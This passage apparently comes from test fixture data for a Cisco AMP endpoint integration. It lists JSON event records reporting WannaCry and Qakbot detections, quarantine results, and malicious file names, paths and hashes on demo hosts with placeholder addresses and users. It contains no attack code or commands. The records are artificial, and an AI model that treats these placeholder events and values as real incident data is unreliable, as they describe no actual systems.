sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":721000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":646000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":504000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":426000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":399000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662859016176000,"timestamp":1610651432,"timestamp_nanoseconds":199000000,"date":"2021-01-14T19:10:32+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662854721208000,"timestamp":1610651431,"timestamp_nanoseconds":856000000,"date":"2021-01-14T19:10:31+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":233000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"el2j9fcqj.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":396000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":927000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"igvj$vN.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\igvj$vN.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"6951045.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\6951045.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"99fffe78e0cbd7b508eed13a8633903dd89ed5f1","md5":"dc41e47ebba549ec5e616ed9e88a0376"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 